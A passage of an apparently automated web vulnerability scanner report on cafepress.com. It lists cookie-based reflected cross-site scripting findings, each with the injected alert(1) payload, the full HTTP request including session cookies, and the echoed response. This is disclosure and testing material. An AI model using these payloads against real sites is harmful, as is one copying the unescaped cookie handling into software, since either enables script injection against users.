<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'ProductDetails'
window.cafepress.tealeaf.searchTerm = '2434e</script><script>alert(1)</script>da77cba4a3a'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.6. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5445"-alert(1)-"653f5650114 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc5445"-alert(1)-"653f5650114; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 93186
Date: Sun, 26 Dec 2010 13:46:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc5445"-alert(1)-"653f5650114";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.7. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1f9d</script><script>alert(1)</script>c7da687b934 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b1f9d</script><script>alert(1)</script>c7da687b934; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 93236
Date: Sun, 26 Dec 2010 13:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:56 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:56 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'ProductDetails'
window.cafepress.tealeaf.searchTerm = 'b1f9d</script><script>alert(1)</script>c7da687b934'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.8. http://www.cafepress.com/+aprons [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+aprons

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f815"-alert(1)-"690539d6541 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+aprons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA7f815"-alert(1)-"690539d6541; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 60358
Date: Sun, 26 Dec 2010 13:47:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/
Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA7f815"-alert(1)-"690539d6541";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.9. http://www.cafepress.com/+aprons [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+aprons

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87e97</script><script>alert(1)</script>edc3d2d6805 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+aprons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=87e97</script><script>alert(1)</script>edc3d2d6805; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 60380
Date: Sun, 26 Dec 2010 13:47:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/
Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '87e97</script><script>alert(1)</script>edc3d2d6805'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.10. http://www.cafepress.com/+baby-blanket [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+baby-blanket

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60566"-alert(1)-"db88db638f9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+baby-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA60566"-alert(1)-"db88db638f9; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 58705
Date: Sun, 26 Dec 2010 13:47:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA60566"-alert(1)-"db88db638f9";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.11. http://www.cafepress.com/+baby-blanket [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+baby-blanket

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b770e</script><script>alert(1)</script>35f226fbd0 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+baby-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b770e</script><script>alert(1)</script>35f226fbd0; 